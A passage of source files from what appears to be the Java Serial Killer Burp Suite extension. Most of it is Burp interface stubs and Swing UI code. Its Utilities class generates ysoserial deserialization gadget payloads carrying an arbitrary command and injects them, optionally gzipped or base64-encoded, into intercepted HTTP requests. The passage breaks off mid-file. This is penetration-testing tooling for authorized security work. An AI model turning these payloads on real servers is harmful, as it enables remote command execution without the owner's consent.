2 | * @(#)burp.ITempFile.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to hold details of a temporary file that has been
12 | * created via a call to
13 | * burp.IBurpExtenderCallbacks.saveToTempFile().
14 | *
15 | */
16 | public interface ITempFile
17 | {
18 | /**
19 | * This method is used to retrieve the contents of the buffer that was saved
20 | * in the temporary file.
21 | *
22 | * @return The contents of the buffer that was saved in the temporary file.
23 | */
24 | byte[] getBuffer();
25 |
26 | /**
27 | * This method is deprecated and no longer performs any action.
28 | */
29 | @Deprecated
30 | void delete();
31 | }
32 |
--------------------------------------------------------------------------------
/src/main/java/burp/ITextEditor.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.ITextEditor.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.Component;
11 |
12 | /**
13 | * This interface is used to provide extensions with an instance of Burp's raw
14 | * text editor, for the extension to use in its own UI. Extensions should call
15 | * burp.IBurpExtenderCallbacks.createTextEditor() to obtain an instance
16 | * of this interface.
17 | */
18 | public interface ITextEditor
19 | {
20 | /**
21 | * This method returns the UI component of the editor, for extensions to add
22 | * to their own UI.
23 | *
24 | * @return The UI component of the editor.
25 | */
26 | Component getComponent();
27 |
28 | /**
29 | * This method is used to control whether the editor is currently editable.
30 | * This status can be toggled on and off as required.
31 | *
32 | * @param editable Indicates whether the editor should be currently
33 | * editable.
34 | */
35 | void setEditable(boolean editable);
36 |
37 | /**
38 | * This method is used to update the currently displayed text in the editor.
39 | *
40 | * @param text The text to be displayed.
41 | */
42 | void setText(byte[] text);
43 |
44 | /**
45 | * This method is used to retrieve the currently displayed text.
46 | *
47 | * @return The currently displayed text.
48 | */
49 | byte[] getText();
50 |
51 | /**
52 | * This method is used to determine whether the user has modified the
53 | * contents of the editor.
54 | *
55 | * @return An indication of whether the user has modified the contents of
56 | * the editor since the last call to
57 | * setText().
58 | */
59 | boolean isTextModified();
60 |
61 | /**
62 | * This method is used to obtain the currently selected text.
63 | *
64 | * @return The currently selected text, or
65 | * null if the user has not made any selection.
66 | */
67 | byte[] getSelectedText();
68 |
69 | /**
70 | * This method can be used to retrieve the bounds of the user's selection
71 | * into the displayed text, if applicable.
72 | *
73 | * @return An int[2] array containing the start and end offsets of the
74 | * user's selection within the displayed text. If the user has not made any
75 | * selection in the current message, both offsets indicate the position of
76 | * the caret within the editor.
77 | */
78 | int[] getSelectionBounds();
79 |
80 | /**
81 | * This method is used to update the search expression that is shown in the
82 | * search bar below the editor. The editor will automatically highlight any
83 | * regions of the displayed text that match the search expression.
84 | *
85 | * @param expression The search expression.
86 | */
87 | void setSearchExpression(String expression);
88 | }
89 |
--------------------------------------------------------------------------------
/src/main/java/burp/JavaSerialKiller.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | public class JavaSerialKiller {
4 |
5 | private final JavaSerialKillerTab tab;
6 |
7 | public JavaSerialKiller(JavaSerialKillerTab tab){
8 | this.tab = tab;
9 | }
10 |
11 | public void sendToTab(IHttpRequestResponse requestResponse) {
12 |
13 | tab.createTab(String.valueOf(JavaSerialKillerTab.tabCount),requestResponse);
14 |
15 | }
16 |
17 | }
18 |
--------------------------------------------------------------------------------
/src/main/java/burp/JavaSerialKillerTab.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.awt.*;
4 |
5 | import javax.swing.*;
6 |
7 | public class JavaSerialKillerTab implements ITab {
8 |
9 | private final JTabbedPane tabs;
10 | private final IBurpExtenderCallbacks callbacks;
11 | static int tabCount = 0;
12 | static int removedTabCount = 0;
13 |
14 | public JavaSerialKillerTab(final IBurpExtenderCallbacks callbacks) {
15 | this.callbacks = callbacks;
16 |
17 | tabs = new JTabbedPane();
18 |
19 | callbacks.customizeUiComponent(tabs);
20 |
21 | callbacks.addSuiteTab(JavaSerialKillerTab.this);
22 |
23 |
24 | }
25 |
26 | public ChildTab createTab(String title, IHttpRequestResponse requestResponse) {
27 |
28 | ChildTab sktab = new ChildTab((callbacks), tabs, title, requestResponse.getRequest(), requestResponse.getHttpService());
29 | tabs.setSelectedIndex(tabCount - removedTabCount);
30 | tabCount++;
31 |
32 | return sktab;
33 | }
34 |
35 | public String getTabCaption() {
36 | return "Java Serial Killer";
37 | }
38 |
39 | public Component getUiComponent() {
40 | return tabs;
41 | }
42 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Menu.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import javax.swing.*;
4 | import java.awt.event.MouseEvent;
5 | import java.awt.event.MouseListener;
6 | import java.util.ArrayList;
7 | import java.util.List;
8 |
9 | public class Menu implements IContextMenuFactory {
10 | private IExtensionHelpers helpers;
11 | private IBurpExtenderCallbacks callbacks;
12 | private JavaSerialKillerTab tab;
13 | JavaSerialKiller sk;
14 |
15 |
16 | public Menu(IBurpExtenderCallbacks callbacks) {
17 | helpers = callbacks.getHelpers();
18 | this.callbacks = callbacks;
19 | }
20 |
21 | public List createMenuItems(final IContextMenuInvocation invocation) {
22 | ArrayList menus = new ArrayList();
23 |
24 | JMenuItem sendToSerialKiller = new JMenuItem("Send to Java Serial Killer");
25 |
26 | sendToSerialKiller.addMouseListener(new MouseListener() {
27 |
28 | public void mouseClicked(MouseEvent arg0) {
29 |
30 | }
31 |
32 |
33 | public void mouseEntered(MouseEvent arg0) {
34 | }
35 |
36 |
37 | public void mouseExited(MouseEvent arg0) {
38 | }
39 |
40 |
41 | public void mousePressed(MouseEvent arg0) {
42 |
43 | }
44 |
45 |
46 | public void mouseReleased(MouseEvent arg0) {
47 | if (tab == null){
48 | tab = new JavaSerialKillerTab(callbacks);
49 | sk = new JavaSerialKiller(tab);
50 | }
51 |
52 | IHttpRequestResponse iReqResp = invocation.getSelectedMessages()[0];
53 | sk.sendToTab(iReqResp);
54 |
55 | }
56 | });
57 |
58 | menus.add(sendToSerialKiller);
59 | return menus;
60 | }
61 |
62 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Utilities.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 |
4 | import com.google.common.primitives.Bytes;
5 | import ysoserial.Serializer;
6 | import ysoserial.payloads.ObjectPayload;
7 |
8 | import java.io.ByteArrayOutputStream;
9 | import java.io.IOException;
10 | import java.util.ArrayList;
11 | import java.util.Arrays;
12 | import java.util.Base64;
13 | import java.util.List;
14 | import java.util.regex.Matcher;
15 | import java.util.regex.Pattern;
16 | import java.util.zip.GZIPOutputStream;
17 |
18 | public class Utilities {
19 |
20 | public static byte[] gzipByteArray(byte[] data) {
21 | ByteArrayOutputStream bos = new ByteArrayOutputStream();
22 | try {
23 | GZIPOutputStream gzip = new GZIPOutputStream(bos);
24 | gzip.write(data);
25 | gzip.close();
26 | data = bos.toByteArray();
27 | bos.close();
28 | } catch (IOException ignored) {
29 | }
30 |
31 | return data;
32 | }
33 |
34 | public static byte[] serializeRequest(
35 | byte[] message, byte[] selectedMessage, boolean isEncoded, boolean isCompressed, String command,
36 | IExtensionHelpers helpers, String payloadType
37 | ) {
38 |
39 | int selectedOffset = 0;
40 | int endingOffset = 0;
41 |
42 | if (selectedMessage != null) {
43 | selectedOffset = Bytes.indexOf(message, selectedMessage);
44 | endingOffset = selectedOffset + selectedMessage.length;
45 |
46 | } else if (ChildTab.selectedMessage != null) {
47 | byte[] payload = ChildTab.selectedMessage;
48 | if (ChildTab.isCompressed) {
49 | payload = gzipByteArray(payload);
50 | }
51 | if (ChildTab.isEncoded) {
52 | payload = Base64.getEncoder().encode(payload);
53 | }
54 |
55 | selectedOffset = Bytes.indexOf(message, payload);
56 | endingOffset = selectedOffset + payload.length;
57 | }
58 |
59 | if (ChildTab.selectedMessage != null || selectedMessage != null) {
60 |
61 | byte[] beginningArray = Arrays.copyOfRange(message, 0, selectedOffset);
62 | byte[] endingArray = Arrays.copyOfRange(message, endingOffset, message.length);
63 |
64 | byte[] exploitArray = getExploitPayload(payloadType, command);
65 |
66 | ChildTab.selectedMessage = exploitArray;
67 |
68 |
69 | if (isCompressed) {
70 | exploitArray = gzipByteArray(exploitArray);
71 | ChildTab.isCompressed = true;
72 | } else {
73 | ChildTab.isCompressed = false;
74 | }
75 |
76 | byte[] output;
77 |
78 | if (isEncoded) {
79 | ChildTab.isEncoded = true;
80 | byte[] base64EncodedExploit = Base64.getEncoder().encode(exploitArray);
81 |
82 | output = Bytes.concat(beginningArray, base64EncodedExploit, endingArray);
83 | } else {
84 | ChildTab.isEncoded = false;
85 | output = Bytes.concat(beginningArray, exploitArray, endingArray);
86 | }
87 |
88 | IRequestInfo iRequestInfo = helpers.analyzeRequest(output);
89 |
90 | int bodyOffset = iRequestInfo.getBodyOffset();
91 |
92 | java.util.List headers = iRequestInfo.getHeaders();
93 |
94 | byte[] newBody = new byte[output.length - bodyOffset];
95 |
96 | System.arraycopy(output, bodyOffset, newBody, 0, output.length - bodyOffset);
97 |
98 | return helpers.buildHttpMessage(headers, newBody);
99 | } else {
100 | return message;
101 | }
102 | }
103 |
104 | private static byte[] getExploitPayload(String payloadType, String command) {
105 |
106 | final Class payloadClass = ObjectPayload.Utils.getPayloadClass(
107 | payloadType.split(" ")[0]
108 | );
109 |
110 | byte[] exploitPayload = new byte[0];
111 |
112 | try {
113 | final ObjectPayload payload = payloadClass.newInstance();
114 | final Object object = payload.getObject(command);
115 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true");
116 | exploitPayload = Serializer.serialize(object);
117 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "false");
118 | } catch (Throwable e) {
119 | System.err.println("Error while generating or serializing payload");
120 | e.printStackTrace();
121 | }
122 |
123 | return exploitPayload;
124 |
125 | }
126 |
127 | public static String[] formatCommand(String command) {
128 | List list = new ArrayList<>();
129 | Matcher m = Pattern.compile("([^\']\\S*|\'.*?(.*).*?.+?\')\\s*").matcher(command);
130 | int first;
131 | int last;
132 | String firstFix;
133 | String lastFix;
134 | while (m.find()) {
135 | if (m.group(1).contains("\'")) {
136 | first = m.group(1).indexOf('\'');
137 | firstFix = new StringBuilder(m.group(1)).replace(first, first + 1, "").toString();
138 | last = firstFix.lastIndexOf('\'');
139 | lastFix = new StringBuilder(firstFix).replace(last, last + 1, "").toString();
140 | list.add(lastFix);
141 | } else {
142 | list.add(m.group(1));
143 | }
144 | }
145 |
146 | return list.toArray(new String[list.size()]);
147 | }
148 | }
149 |
--------------------------------------------------------------------------------
/src/main/java/ysoserial/Deserializer.java:
--------------------------------------------------------------------------------
1 | package ysoserial;
2 |
3 | import java.io.ByteArrayInputStream;
4 | import java.io.File;
5 | import java.io.FileInputStream;
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.ObjectInputStream;
9 | import java.util.concurrent.Callable;
10 |
11 | public class Deserializer implements Callable